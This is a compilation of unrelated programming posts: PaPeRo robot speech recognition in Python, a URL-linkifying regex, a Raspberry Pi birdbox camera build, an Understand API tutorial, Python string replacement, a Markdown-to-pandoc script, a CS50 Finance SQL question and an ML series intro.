The speech recognition built into the PaPeRo i itself:
recognizes single words only
leaves a noticeable pause before recognizing
seems limited to a few dozen recognition words?
So compared with cloud-based recognition it is fairly weak, and it may be a bit of a stretch for apps that hold a "conversation" with people, but for apps driven by spoken commands it is usable with a little ingenuity.
How to use it from Python
To start speech recognition you basically call the APIs in the following order (for the standard dictionary):
(1) send_read_dictionary(‘/opt/papero/lib/Standard.mrg’)
(2) send_add_speech_recognition_rule(‘Standard’)
(3) send_start_speech_recognition()
It seems to be fine to call these back to back without waiting for the responses.
Once this is done, detectPhrase events start to occur.
In a detectPhrase event the recognized phrase arrives under the key "Expression".
If recognition was not successful, "Expression" contains "Reject".
Also, if you make the robot speak while speech recognition is enabled it will recognize its own speech, so when you want it to speak, call
send_stop_speech_recognition()
before speaking, and after the utterance has finished call
send_start_speech_recognition()
to resume recognition.
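Putting that together, a minimal sketch of the speak-then-resume pattern (papero is assumed to be an already connected pypapero.Papero instance; waiting for the speech-finished event is left to the surrounding message loop):
def speak(papero, text):
    papero.send_stop_speech_recognition()   # pause recognition so the robot does not hear itself
    papero.send_start_speech(text)
    # ... wait for the speech-finished event in the message loop ...
    papero.send_start_speech_recognition()  # resume recognition afterwards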
Switching between multiple recognition dictionaries
If you prepare several recognition dictionaries in advance and switch between them from scene to scene, you can broaden what an app can do considerably.
Get the API calling order wrong and you can end up in a state where speech recognition never works again, but in my tests the following sequence switched dictionaries and restarted recognition correctly regardless of the current state: first use, recognition currently enabled, or enabled once and then disabled.
(1) send_stop_speech_recognition()
(2) send_free_dictionary(”)
(3) send_read_dictionary(path to the speech recognition dictionary file)
(4) send_add_speech_recognition_rule(‘Standard’)
(5) send_start_speech_recognition()
Sample program
This sample program displays each recognized phrase, and switches to the standard dictionary with the left button (as you face the robot) and to a custom dictionary (not installed as standard) with the right button.
It does not make the robot speak, but as noted above, if you also want speech output you will need to track the speaking state and add the control that stops and restarts speech recognition.
import sys
from logging import (getLogger, Formatter, debug, info, warn, error, critical,
DEBUG, INFO, WARN, ERROR, CRITICAL, basicConfig)
import pypapero
logger = getLogger(__name__)
RECOG_DIC_STD = '/opt/papero/lib/Standard.mrg'
RECOG_DIC_ADD1 = '/opt/papero/lib/Standard_stdadd20180418.mrg'
def speech_recog_init(papero, dn=RECOG_DIC_STD):
logger.info('dictionary={}'.format(dn))
papero.send_stop_speech_recognition()
papero.send_free_dictionary('')
papero.send_read_dictionary(dn)
papero.send_add_speech_recognition_rule('Standard')
papero.send_start_speech_recognition()
papero.send_turn_led_on('ear', ["W2W2", str(int(2000 / 100)), "NN", str(int(2000 / 100))], repeat=True)
def speech_recog_fin(papero):
logger.info('recog fin')
papero.send_stop_speech_recognition()
#papero.send_delete_speech_recognition_rule('Standard')
papero.send_free_dictionary('')
papero.send_turn_led_on('ear', ["NN", str(int(1000 / 100))], repeat=False)
if __name__ == "__main__":
basicConfig(level=INFO, format='%(asctime)s %(levelname)s %(name)s %(funcName)s %(message)s')
simulator_id, robot_name, ws_server_addr = pypapero.get_params_from_commandline(sys.argv)
papero = pypapero.Papero(simulator_id, robot_name, ws_server_addr)
if papero.errOccurred == 0:
papero.send_start_speech("音声認識デモ")
speech_recog_init(papero)
while True:
messages = papero.papero_robot_message_recv(1.0)
if messages is None:
continue
if 0 == len(messages):
continue
msg0 = messages[0]
nm = msg0.get("Name")
if nm == "detectButton":
status = msg0["Status"]
if status == "R":
speech_recog_init(papero)
elif status == "L":
speech_recog_init(papero, RECOG_DIC_ADD1)
elif status == "C":
break
elif nm == "detectPhrase":
if "Expression" in msg0:
phrase = msg0["Expression"]
if phrase != "Reject":
logger.info(phrase)
else:
pass
speech_recog_fin(papero)
papero.papero_cleanup()
|
From time to time, I run across situations where the linkifying Greasemonkey script I use mistakenly includes a closing parenthesis in what it considers to be a URL.
Given that I can’t remember a single situation where I needed to linkify a URL with nested unescaped parentheses but URLs inside parentheses have bitten me repeatedly, I decided to solve the problem in a way that’ll work with any regex grammar.
const urlRegex = /\b((ht|f)tps?:\/\/[^\s+\"\<\>()]+(\([^\s+\"\<\>()]*\)[^\s+\"\<\>()]*)*)/ig;
Basically, it matches:
http, https, ftp, or ftps followed by ://
an alternating sequence of “stuff” and balanced pairs of parentheses containing “stuff”
…where “stuff” refers to a sequence of zero or more non-whitespace, non-parenthesis characters (and, in the linkify.user.js version, no angle brackets, double quotes, or plus signs either).
Embarrassingly, aside from two corrections and a few extra characters in the blacklists that I kept from the original linkify.user.js regex, this is a direct translation of something I wrote for http://ssokolow.com/scripts/ years ago… I’d just never remembered the problem in a situation where I could spare the time and willpower to do something about it.
Here’s the corrected Python original.
hyperlinkable_url_re = re.compile(r"""((?:ht|f)tps?://[^\s()]+(?:\([^\s()]*\)[^\s()]*)*)""", re.IGNORECASE | re.UNICODE)
The corrections made were:
Allow the pairs of literal parentheses to be empty
Move a grouping parenthesis so that a(b)c(d)e will be matched as readily as a(b)(c)d.
Markdown source code works especially well to demonstrate the difference.
Naive linkifying regex: in [FreeDOS](http://freedos.org). the URL match swallows the closing parenthesis.
My linkifying regex: in [FreeDOS](http://freedos.org). the URL match stops at http://freedos.org, leaving the ')' alone.
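A quick interactive check (not from the original post) shows the difference on a URL inside parentheses versus a URL that itself contains balanced parentheses:
import re

hyperlinkable_url_re = re.compile(r"""((?:ht|f)tps?://[^\s()]+(?:\([^\s()]*\)[^\s()]*)*)""", re.IGNORECASE | re.UNICODE)

print(hyperlinkable_url_re.findall("See FreeDOS (http://freedos.org) for details."))
# ['http://freedos.org'] -- the closing parenthesis is not swallowed
print(hyperlinkable_url_re.findall("https://en.wikipedia.org/wiki/Python_(programming_language)"))
# ['https://en.wikipedia.org/wiki/Python_(programming_language)']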
Theoretically, look-ahead/behind assertions are enough of an extension to regexp syntax to allow real HTML parsing, so I could probably also support nested parens, but I’m just not in the mood to self-nerd-snipe right now.
|
A birdbox camera based on a Raspberry Pi Zero.
Introduction
We have a birdbox on the side of the house and thought that it would be interesting to be able to see which birds were using it, and possibly also see if chicks are raised there.
Here’s the kind of video that we get back (with the default settings).
Hardware
For the camera system, I’ve used a Raspberry Pi Zero W with a Noir camera (their standard camera with the IR cut filter removed). Illumination is a couple of 940nm IR LEDs that are from Adafruit. To control them, I’ve designed a simple PCB that uses a FAN5333B LED driver circuit. This will control the current that the LEDs draw regardless of what temperature the box gets to and will allow their brightness to be controlled with a signal from the Raspberry Pi, including turning them off to prevent wasting (more) electricity.
Temperature Sensor
In addition to the LED driver circuit, there is a DS18b20 temperature sensor on the Pi board to monitor the temperature in the enclosure. Just because. I soldered the sensor directly to the header connections on the Pi since space is limited, and soldered a 1206 surface-mount 10K resistor across the 3v3 and ~DQ lines to provide the pullup that it needs to work properly.
Getting the Raspberry Pi working
The instructions on the motioneye wiki don't work on a current Raspberry Pi OS image as of 25 Oct 2020. I followed the instructions here instead: [Link to pimpingthepenguin.com](https://www.pimpingthepenguin.com/2020/06/raspberry-pi-zero-setup-for-motion-eye),
which are based on the installation instructions on the motioneye wiki here: [link to the motioneye GitHub page](https://github.com/ccrisan/motioneye/wiki/Install-On-Raspbian).
In summary, you need to use: apt install python-pip python-dev libssl-dev libcurl4-openssl-dev libjpeg-dev zlib1g-dev python-pil instead of apt install python-pip python-dev libssl-dev libcurl4-openssl-dev libjpeg-dev libz-dev as given in the motioneye install instructions.
This gets the code to run, but it doesn’t connect to the camera properly. Also note that python2 is no longer supported on Raspbian, and python 3.7 is the default. This means that you need to issue pip2 install motion so that it’s explicitly installed on python 2.x on your system.
Once you’ve followed all the instructions, you should be able to log in to the motioneye interface using your web browser and add a camera. I found that the camera initially did not work. The issue was that the /dev/video10 device was chosen instead of /dev/video0, which is where the camera appeared on this Pi. Edit /etc/motion/camera-1.conf to change the camera device to the correct one, restart the motioneye server, and it should work.
Enclosure
I purchased a wooden bird box from a local DIY store branded as ‘Peckish’. For the Raspberry Pi, I designed a simple enclosure that fits under the roof of the birdbox and printed it out in black PLA. The enclosure has a clip detail for the LED driver board, and mounting screws for the Raspberry Pi.
The LEDs are mounted either side of the Pi, and are pushed into place. A simple clip provides some strain relief on the power cable, which passes through a small hole at the front of the base. The lid itself is held on with a pair of M3 screws and I tapped a thread into the mating part to hold the screws. The Pi is held on four M2.5 screws which are screwed into tapped holes in the lid piece.
Assembly
The Pi fits into the base of the enclosure, which is held to the roof of the box with two screws. I sprayed the enclosure, and all of the electronics inside it with a conformal coating to try to keep moisture out.
Once the enclosure was assembled, I fitted it to the inside of the roof of the enclosure, and then protected everything with a small piece of roofing felt that we had left over from the last time the shed roof was repaired. This was heated using a hot air gun to get it to bend over the edges of the roof, and held in place with some small clout nails.
Power Supply
Power is supplied from a 5V, 15W supply that is mounted on the wall in the garage. I used a 1.5mm^2 core cable to minimise voltage drop from the internal cable resistance. At the top end, the cable is fed into the bird box, and is terminated in some heatshrink packed with silicone to keep everything dry. The final entry into the camera enclosure is done through smaller gauge wire that’s soldered to the large cable.
Controlling the LED
The LED illuminators are controlled with a GPIO pin on the raspberry pi. When it’s high, the LEDs are on, and when it’s low the LEDs are off. This means that they can be controlled remotely using software. I wrote some very very simple python code to turn the LED on for 25 seconds when motion is detected in the box. This means that the lights are off until something comes to have a look and then they’re turned on for the duration of the video recording (which itself is set to 30s).
#!/usr/bin/python
import RPi.GPIO as GPIO
import time

GPIO.setmode(GPIO.BOARD)  # Which GPIO addressing method to use.
GPIO.setup(12, GPIO.OUT, initial=GPIO.HIGH)  # Pin we're going to control
GPIO.output(12, True)  # On for 25s
time.sleep(25)
GPIO.output(12, False)  # Then off again
GPIO.cleanup()
Configuration
To make sure that the LED for the camera and activity on the Raspberry Pi are switched off to prevent disturbing the birds, add the following to the end of /boot/config.txt (you’ll need to be an admin on the pi):
#Disabling LEDs on the system to make it dark
disable_camera_led=1
dtparam=act_led_trigger=none
dtparam=act_led_activelow=on
The motion interface allows lots of settings to be adjusted. Until we’ve got nesting birds in the box, I set it up to be motion-activated and to record a 30 second clip whenever something moves in the box. Motion is able to detect and take-care of changes in ambient lighting, so dawn doesn’t cause images to be collected. At the same time as recording is started, I call a web hook to ifttt.com which fires a notification on my phone using the maker channel, and also the python script that turns on the LEDs to better-illuminate the bird in the box.
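For completeness, here is a hedged sketch (not the author's actual script) of calling the IFTTT Maker webhook mentioned above; the event name and key are placeholders you would replace with your own:
import requests

IFTTT_EVENT = "birdbox_motion"        # assumed event name
IFTTT_KEY = "your-ifttt-maker-key"    # personal key from the Maker Webhooks service

requests.post(
    "https://maker.ifttt.com/trigger/{}/with/key/{}".format(IFTTT_EVENT, IFTTT_KEY),
    json={"value1": "Motion detected in the birdbox"})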
Conclusion
This has been an interesting little project, and one that has used a variety of skills from CAD, electronics design, 3D printing, electronics assembly, programming and setting up a little Linux machine. I’m looking forward to seeing the baby birds.
|
I have written about using the Understand API with Python before, but that was a long time ago.
This post goes into more detail and is more structured and easier to read, with quite a bit censored, since it is internal company work.
Why use Understand? Because the project's source code is huge. Even though we only work on the parts we are told to, at run time the whole thing is used, so we also check the files related to the files we test. Having this program build a database makes life much easier for whoever writes the in-house tools, because writing plain Python to pick out function names and variable names would be quite painful, and besides, how would we even know that this is a variable and that is a function?
The Understand API is open for developers to build on as they like, in Perl, Python and C.
Here it is Python, and Python 3.0 or later at that.
Opening an Understand project file for reading
import understand
db = understand.open("c:\\projects\\test.udb")
for file in db.ents("file"):
print(file.longname())
We import understand to use the library.
Then we open the udb file, which is the Understand project we created.
The last two lines print the paths of all the files.
Note: when reading or writing files, the path must always be written with \\ as the separator,
because a single \ followed by some character is treated by Python as a single combined character (a bit like a trigraph, I suppose).
Getting to know Entity vs. Reference
An entity is something in our code that we can work with, such as a file, class, function or variable. The example above looks at which files are in our project.
A reference records where something appears in the code; it is a relationship between two entities.
Their own example explains it best:
//myFile.c
void main(){
char myString[];
myString = "Hello World!";
}
Roughly speaking: the first box says what the file is called, where it lives and which language it is written in; the next says which function it contains, in which file and on which line.
The variable myString is used in two places, the declaration at the top and the assignment of the value, so it has two references, linking the function main and the variable itself.
Filtering different kinds of entities
When we printed the file names at the start, we were filtering so that only file entities were used.
Usage looks like this:
ents("<kind_filter>"): put the kind of entity you want to find inside the quotes, i.e. File, Class, Function, Variable, Attribute, LambdaParameter, Module, Package.
We can also use logic to help filter the data we want:
NOT uses ~
AND uses a space
OR uses ,
For example:
ents("class, function")) // filter class and function names
ents("Global Object ~Static") // find global objects that are not static
ents(function,method,procedure) // find function names
Sorting the data
Put the sorted function in front of whatever you want to sort:
for ent in sorted(db.ents(), key = lambda ent: ent.name()):
print(ent.name(), "[", ent.kindname(), "]", sep = "", end = "\n")
A1 [Parameter]
A2 [Parameter]
F1 [Static Function]
B1 [Parameter]
Using references to find where an entity we care about is used
for ent in db.ents("Global Object ~Static"):
print(ent, ":", sep="")
for ref in ent.refs():
print(ref.kindname(), ref.file(), "(", ref.line(), ",", ref.column(), ")")
print("\n", end="")
Here we want to know the names of the variables that are global
(the logic is Global & Object & !Static)
and what is done to them where: in which file, at which line and column.
Using regular expressions
First, import re so we can use regular expressions.
Say we want to find files with a particular name, for example .c files whose name contains the word test.
re.compile builds the pattern we are interested in.
re.I means ignore case: upper or lower case doesn't matter, only whether the word matches.
searchstr = re.compile("test*.c", re.I)
for file in db.lookup(searchstr, "File"):
print(file)
Listing functions together with their parameters
First we create a key function:
import string
def sortKeyFunc(ent):
return str.lower(ent.longname())
Then we sort the function names and print each function together with its parameters:
ents = db.ents("function, method, procedure")
for func in sorted(ents, key = sortKeyFunc):
print (func.longname(), " (", sep="", end="")
first = True
for param in func.ents("Define", "Parameter"):
if not first:
print (", ", end="")
print (param.type(), param, end="")
first = False
print (")")
Checking where each function is called from
for func in db.ents("function, method, procedure"):
for line in func.ib():
print (line, end="")
We select the entities that are functions and get the details: where each one is defined, what it returns, what its input parameters are, the names of the local variables used inside it, which functions it calls, which functions call it, which macros it uses, where it is found, and so on.
If we want variables instead, change the above slightly, like this:
for func in db.ents("variable, define, parameter"):
for line in func.ib():
print (line, end="")
Finding comments in a function
for func in db.ents("function ~unresloved ~unknown")
comments = func.comment("after")
if comments:
print (func.longname(), ":\n ", comments, ":\n", sep="")
Lexers and Lexemes
A lexer deals with chunks of text that carry meaning, such as strings, comments and variables.
Lexemes are the stream (as I understand it, chunks bigger than what the lexer sees).
For example, int a=5;//radius
gets split into tokens like this.
This is more fine-grained than entities and references, in that it tells you this is a keyword, this is an operator, and over here is a comment.
Example code:
def fileCleanText(file):
returnString = "";
# Open the file lexer with macros expanded and
# inactive code removed
for lexeme in file.lexer(False,8,False,True):
if(lexeme.token() != "Comment"):
# Go through lexemes in the file and append
# the text of non-comments to returnText
returnString += lexeme.text();
return returnString;
# Search for the first file named 'test' and print
# the file name and the cleaned text
file = db.lookup(".*test.*","file")[0];
print (file.longname());
print(fileCleanText(file));
This defines a function that prints out all of the file's code with the comments removed.
Question: what if we drill down further and ask, for this file, where is this particular variable used?
Since the examples given so far always loop over everything,
we can list the variables inside that particular file and then do whatever we want with each one; here, we show where each variable is declared and where it is assigned.
ref.kindname() can be Define, Type, Init, Set, Use, Addr Use
ent.ref().scope() gives the variable's name (if you are looking up functions it gives the function's name instead)
ref.line() gives the line where it happens
for func in db.ents("global object ~function !static ~local")
for ref in ent.refs():
if (str(ref.file()) == file_name):
print (ref.kindname(), ent.ref().scope(), ref.line())
Question: I want to find the lines that include header files, and see which files are included.
But what if there are similarly named files, say aaa.c and aaa15.c, and we want aaa30.c?
We have to filter db.lookup down to exactly the file name we want before we can go on and use it.
cnt = 0
file = udb.lookup(file_name,"file")
for i in file:
cnt+=1
if (str(i) == file_name + ".c"):
break
file = udb.lookup(file_name,"file")[cnt-1]
Then let's press on, using lexemes for the search. The main lexeme.token() values are:
Comment: plain old comments
Identifier: variable names, constant names, function names
Keyword: e.g. const static struct void if else break case default return for while
Literal: values assigned to variables, the magic numbers you sometimes see
Newline: a line break
Operator: e.g. + - * / = ! || && and so on
Preprocessor: anything with #, e.g. #include #define
Punctuation: e.g. ( ) { } ;
String: strings, obviously
Whitespace: ordinary spaces
So for this question, roughly:
for lexeme in file.lexer():
if (lexeme.token() == "Preprocessor"):
print (lexeme.line_begin(), lexeme.text())
That should give you a better picture of how to use the Understand API from Python.
I'll admit this post sat in drafts for a very long time, because I had to get my head around this API while test work kept coming in, so I worked on it in fits and starts. The Understand database is probably NoSQL-like, since it doesn't store fixed, table-shaped values, and some of the data is one-to-many, for example where a variable is used: a project has a lot of code, and global variables are used in many places.
For anyone who wants to dig deeper, see the links below. Honestly, Google doesn't have much on this, so whenever you hit a problem it's hard to find answers.
- API Tutorial 1: Writing Your First API Script
- API Tutorial 2: Entities, References and Filters
- API Tutorial 3: Lexers and Lexemes
- Python Entity Kinds
- Understand::Ref class
- python interface to Understand databases
- 6.2. re — Regular expression operations — Python 3.5.2 documentation
|
Replacing occurrences of a substring in a string in Python
Replacing all or n occurrences of a substring in a given string is a fairly common string-manipulation and text-processing task. Fortunately, most of these tasks are made easy in Python by its huge set of built-in functions, including one for exactly this.
Let's say we have a string containing the following sentence:
The brown-eyed man drives a brown car.
Our goal is to replace the word "brown" with "blue":
The blue-eyed man drives a blue car.
In this article we will use the replace() function, as well as the sub() and subn() functions with patterns, to replace all occurrences of a substring in a string.
replace()
The simplest way to do this is with the built-in replace() function:
string.replace(oldStr, newStr, count)
The first two parameters are required and the third is optional. oldStr is the substring we want to replace with newStr. It is worth noting that the function returns a new string with the replacement applied, without touching the original.
Let's try it:
string_a = "The brown-eyed man drives a brown car."
string_b = string_a.replace("brown", "blue")
print(string_a)
print(string_b)
We performed the operation on string_a, stored the result in string_b, and printed them both.
This code results in:
The brown-eyed man drives a brown car.
The blue-eyed man drives a blue car.
Again, the string in memory that string_a points to remains unchanged. Strings in Python are immutable, which simply means you cannot modify a string; you can, however, rebind the reference variable to a new value.
To seemingly perform this operation in place, we can simply reassign string_a after the operation:
string_a = string_a.replace("brown", "blue")
print(string_a)
Here the new string created by the replace() method is assigned to the variable string_a.
Replacing n occurrences of a substring
What if we don't want to change every occurrence of the substring? What if we only want to replace the first n?
That's where the third parameter of replace() comes in: it is the number of occurrences that will be replaced. The following code replaces only the first occurrence of the word "brown" with "blue":
string_a = "The brown-eyed man drives a brown car."
string_a = string_a.replace("brown", "blue", 1)
print(string_a)
And in the console we get:
The blue-eyed man drives a brown car.
By default the third parameter is set so that all occurrences are changed.
Substring occurrences with regular expressions
To raise the stakes further, suppose we want to replace not only all occurrences of a specific substring but every substring that matches a certain pattern. Even that can be done in a single line, using regular expressions and the standard-library re module.
Regular expressions are a complex topic with a wide range of uses in computer science, so we won't go into much detail in this article.
In essence, a regular expression defines a pattern. For example, suppose we have some text about people who own cats and dogs, and we want to replace both terms with the word "pet". First we need to define a pattern that matches both terms, for example (cat|dog).
Using the sub() function
Having sorted out the pattern, we will use the re.sub() function, which has the following syntax:
re.sub(pattern, repl, string, count, flags)
The first argument is the pattern we are searching for (a string or a Pattern object), repl is what we are going to insert (it can be a string or a function; if it is a string, any backslash escapes in it are processed), and string is the string we search in.
The optional arguments are count and flags, which specify how many occurrences should be replaced and the flags used to process the regular expression, respectively.
If the pattern does not match any substring, the original string is returned unchanged:
import re
string_a = re.sub(r'(cat|dog)', 'pet', "Mark owns a dog and Mary owns a cat.")
print(string_a)
The console prints:
Mark owns a pet and Mary owns a pet.
Case-insensitive pattern matching
For example, to perform case-insensitive matching, we set the flags parameter to re.IGNORECASE:
import re
string_a = re.sub(r'(cats|dogs)', "Pets", "DoGs are a man's best friend", flags=re.IGNORECASE)
print(string_a)
Now any capitalisation of "dogs" is matched as well. When matching a pattern against several strings, we can define a Pattern object to avoid repeating the pattern in several places. Pattern objects also have a sub() function, with the syntax:
Pattern.sub(repl, string, count)
Using Pattern objects
Let's define a Pattern for cats and dogs and test a couple of sentences:
import re
pattern = re.compile(r'(Cats|Dogs)')
string_a = pattern.sub("Pets", "Dogs are a man's best friend.")
string_b = pattern.sub("Animals", "Cats enjoy sleeping.")
print(string_a)
print(string_b)
Which gives us:
Pets are a man's best friend.
Animals enjoy sleeping.
The subn() function
There is also a subn() method, with the syntax:
re.subn(pattern, repl, string, count, flags)
The subn() function returns a tuple containing the resulting string and the number of matches made:
import re
string_a = re.subn(r'(cats|dogs)', 'Pets', "DoGs are a mans best friend", flags=re.IGNORECASE)
print(string_a)
The tuple looks like this:
('Pets are a mans best friend', 1)
Pattern objects have a similar subn() function:
Pattern.subn(repl, string, count)
And it is used in much the same way:
import re
pattern = re.compile(r'(Cats|Dogs)')
string_a = pattern.subn("Pets", "Dogs are a man's best friend.")
string_b = pattern.subn("Animals", "Cats enjoy sleeping.")
print(string_a)
print(string_b)
This results in:
("Pets are a man's best friend.", 1)
('Animals enjoy sleeping.', 1)
Conclusion
Python offers simple functions for handling strings. The easiest way to replace all occurrences of a given substring in a string is the replace() function.
When needed, the standard-library re module provides a more versatile toolset that can be used for narrower tasks such as pattern matching and case-insensitive search.
|
#!/usr/bin/env python3
import argparse
import copy
import os
import re
import subprocess
import sys
import tempfile
import CommonMark_bkrs as CommonMark
import yaml
def format_keyword(line):
words = line.split(' ')
keyword = words[0]
return '*{}* '.format(keyword) + line[len(keyword):]
def indent(line):
prefix = ' ' * 4
return '>{}{}'.format(prefix, line)
def format_match(keyword, line, m):
n = len(m.groups())
if n > 0:
end = 0
parts = []
for i in range(1, n+1):
parts.append(line[end:m.start(i)])
thispart = line[m.start(i) : m.end(i)]
parts.append('*{}*'.format(thispart))
end = m.end(i)
line = ''.join(parts) + line[m.end(n):]
line = '{} {}'.format(keyword, line)
return line
def format_backtick(c):
if c == "`":
return "`"
return c
def format_chars(s):
return ''.join(format_backtick(c) for c in s)
def format_scenario_step(bind, line, prev_keyword):
debug('line: %r' % line)
words = line.split()
if not words:
return line.strip(), prev_keyword
keyword = words[0]
real_keyword = keyword
if keyword.lower() == 'and':
if prev_keyword is None:
sys.exit('AND may not be used on first step in snippet')
real_keyword = prev_keyword
debug('keyword: %r' % keyword)
line = line[len(keyword):].lstrip()
debug('line: %r' % line)
for b in bind:
debug('consider binding %r' % b)
if real_keyword not in b:
debug('keyword %r not in binding' % real_keyword)
continue
m = re.match(b[real_keyword.lower()], line, re.I | re.M)
debug('m: %r' % m)
if m and m.end() == len(line):
debug('match: %r' % line)
debug(' : %r' % m.groupdict())
line = format_match(keyword, line, m)
break
else:
line = '{} {}'.format(keyword, line)
if not line.strip():
return line
line = format_chars(line)
debug('pre-indent: %r' % line)
lines = line.splitlines()
if len(lines) > 1:
line = '\n'.join([lines[0] + ' '] + [indent(x) + ' ' for x in lines[1:]])
debug('post-indent: %r' % line)
return format_keyword(line), real_keyword
def count_leading_whitespace(s):
n = 0
while s and s[0].isspace():
n += 1
s = s[1:]
return n
def skip_indent(s, indent):
while indent > 0 and s and s[0].isspace():
s = s[1:]
indent -= 1
return s
def get_steps(lines):
step = []
indent = None
for line in lines:
if not line.strip():
yield '\n'.join(step)
step = []
indent = None
elif line[0].isspace():
if indent is None:
indent = count_leading_whitespace(line)
line = skip_indent(line, indent)
step.append(line)
else:
yield '\n'.join(step)
step = [line]
indent = None
if step:
yield '\n'.join(step)
def format_fable_snippet(bind, lines):
# debug('snippet: %r' % lines)
prev_keyword = None
output = []
for step in get_steps(lines):
debug('step: %r' % step)
ln, prev_keyword = format_scenario_step(bind, step, prev_keyword)
output.append(ln)
return output
def is_fable_snippet(o):
prefix = "```fable\n"
return o.t == 'FencedCode' and o.info == 'fable'
def is_heading(o):
return o.t =='ATXHeader'
def write_document(bind, f, o):
pass
def write_atxheader(bind, f, o):
f.write('{} {}\n\n'.format('#' * o.level, ' '.join(o.strings)))
def write_setextheader(bind, f, o):
chars = {
1: '=',
2: '-',
}
c = chars[o.level]
f.write('{}\n{}\n\n'.format(' '.join(o.strings), c * 72))
def write_paragraph(bind, f, o):
for s in o.strings:
f.write('{}\n'.format(s))
f.write('\n')
def write_fable_snippet(bind, f, o):
for line in format_fable_snippet(bind, o.strings[1:]):
f.write('> {} \n'.format(line))
f.write('\n')
def write_not_fable_snippet(bind, f, o):
fence = o.fence_char * o.fence_length
lang = o.strings[0]
f.write('{}{}\n'.format(fence, lang))
for line in o.strings[1:]:
f.write('{}\n'.format(line))
f.write('{}\n'.format(fence))
f.write('\n')
def write_fencedcode(bind, f, o):
if is_fable_snippet(o):
write_fable_snippet(bind, f, o)
else:
write_not_fable_snippet(bind, f, o)
def write_indentedcode(bind, f, o):
for s in o.strings:
f.write(' {}\n'.format(s))
f.write('\n')
def write_horizontalrule(bind, f, o):
f.write('---\n')
def write_list(bind, f, o):
pass
def write_listitem(bind, f, o):
bullet = o.list_data['bullet_char']
offset = o.list_data['marker_offset']
padding = o.list_data['padding']
prefix = '{}{} '.format(' ' * offset, bullet)
cont = ' ' * padding
for c in o.children:
prepend = prefix
for s in c.strings:
f.write('{}{}\n'.format(prepend, s))
prepend = cont
if o.last_line_blank:
f.write('\n')
return True
def write_referencedef(bind, f, o):
for s in o.strings:
f.write('{}\n'.format(s))
writers = {
'Document': write_document,
'ATXHeader': write_atxheader,
'SetextHeader': write_setextheader,
'Paragraph': write_paragraph,
'FencedCode': write_fencedcode,
'IndentedCode': write_indentedcode,
'HorizontalRule': write_horizontalrule,
'List': write_list,
'ListItem': write_listitem,
'ReferenceDef': write_referencedef,
}
def write(bind, f, o):
if o.t not in writers:
debug('{} not known'.format(repr(o.t)))
return
writer = writers[o.t]
return writer(bind, f, o)
def walk(o, func):
done = func(o)
if not done:
for c in o.children:
walk(c, func)
def infer_basename(markdowns):
root, ext = os.path.splitext(markdowns[0])
if ext not in ['.md', '.mdwn']:
sys.exit('Input filenames must end in .md or .mdwn')
return root
# This only allows one markdown filename. This is crap. But I can't
# get it work with -- otherwise. What I want is for the following to
# work:
# ftt-docgetn --pdf foo.md bar.md -- --pandoc-arg --other-pandoc-arg
# but I can't make it work.
def parse_cli():
p = argparse.ArgumentParser()
p.add_argument('--pdf', action='store_true')
p.add_argument('--html', action='store_true')
p.add_argument('markdown', nargs=1)
args, pandoc_args = p.parse_known_args()
return args, pandoc_args
def debug(msg):
if False:
sys.stderr.write('DEBUG: {}\n'.format(msg))
sys.stderr.flush()
def pandoc(args):
argv = ['ftt-pandoc'] + args
subprocess.check_call(argv)
args, pandoc_args = parse_cli()
text = ''.join(open(filename).read() for filename in args.markdown)
basename = infer_basename(args.markdown)
dirname = os.path.dirname(basename)
with open(basename + '.yaml') as f:
bindings = yaml.safe_load(f)
start = '---\n'
end = '\n...\n'
if text.startswith(start):
meta, text = text.split(end, 1)
meta += end + '\n'
else:
meta = ''
parser = CommonMark.DocParser()
ast = parser.parse(text)
if args.pdf or args.html:
with tempfile.NamedTemporaryFile(mode='w', dir=dirname) as f:
f.write(meta)
walk(ast, lambda o: write(bindings, f, o))
f.flush()
if args.pdf:
pandoc(['-o', basename + '.pdf', f.name] + pandoc_args)
elif args.html:
pandoc(['-o', basename + '.html', f.name] + pandoc_args)
else:
sys.stdout.write(meta)
walk(ast, lambda o: write(bindings, sys.stdout, o))
|
I'm stuck on pset8 CS50 Finance /buy: form validation works properly, but when I try to execute the INSERT INTO the transactions table I get the following error:
RuntimeError: (sqlite3.OperationalError) near "'A'": syntax error
[SQL: INSERT INTO transactions (buyer, symbol, price, shares, total)
VALUES(8 'A' 72.16 1 72.16)]
my "transactions" table query is as follows:
CREATE TABLE 'transactions'
('id' integer PRIMARY KEY AUTOINCREMENT NOT NULL,
'buyer' integer NOT NULL,
'symbol' text NOT NULL,
'price' real NOT NULL,
'shares' INTEGER NOT NULL ,
'total' INTEGER NOT NULL ,
'transacted' datetime NOT NULL DEFAULT 'datetime(''now'')')
I'll add that I tried to implement the 'transacted' field in various ways (with defaults, without, etc.), even though it doesn't seem to be the problem.
Here's the current code I wrote:
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Form validation
if not request.form.get("symbol"):
return apology("Missing symbol")
elif not request.form.get("shares"):
return apology("Missing shares")
elif int(request.form.get("shares")) <= 0:
return apology("Invalid Shares")
elif not lookup(request.form.get("symbol")):
return apology("Invalid Symbol")
# Review user's cash
cash = db.execute("SELECT cash FROM users WHERE id= :id", \
id=session["user_id"])
# Ensure user can afford the transaction
stock = lookup(request.form.get("symbol"))
shares = int(request.form.get("shares"))
total = stock["price"] * shares
if cash[0]["cash"] < total:
return apology("Can't Afford")
# Confirm transaction, update user's balance
transaction = db.execute("INSERT INTO transactions (buyer, symbol, price, shares, total) VALUES(:buyer :symbol :price :shares :total)", \
buyer=session["user_id"], symbol=stock["symbol"], price=stock["price"], shares=shares, total=total)
cash = db.execute("UPDATE users SET cash = :cash WHERE id = :id", \
cash=cash - total, id=session["user_id"])
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("buy.html")
Thanks in advance for your help!
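Judging by the error message (the values are run together with no separators), the most likely culprit is the missing commas between the named placeholders in the VALUES clause. A sketch of the likely fix, keeping the same CS50 db wrapper; the UPDATE probably also needs the numeric cash value rather than the raw query result:

# Sketch only: add commas between the placeholders in VALUES,
# and index into the earlier SELECT result when updating the balance.
transaction = db.execute("INSERT INTO transactions (buyer, symbol, price, shares, total) VALUES(:buyer, :symbol, :price, :shares, :total)",
    buyer=session["user_id"], symbol=stock["symbol"], price=stock["price"], shares=shares, total=total)
db.execute("UPDATE users SET cash = :cash WHERE id = :id",
    cash=cash[0]["cash"] - total, id=session["user_id"])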
|
Overview
This will be the fourth article in a four-part series covering the following:
Dataset analysis - We will present and discuss a dataset selected for our machine learning experiment. This will include some analysis and visualisations to give us a better understanding of what we're dealing with.
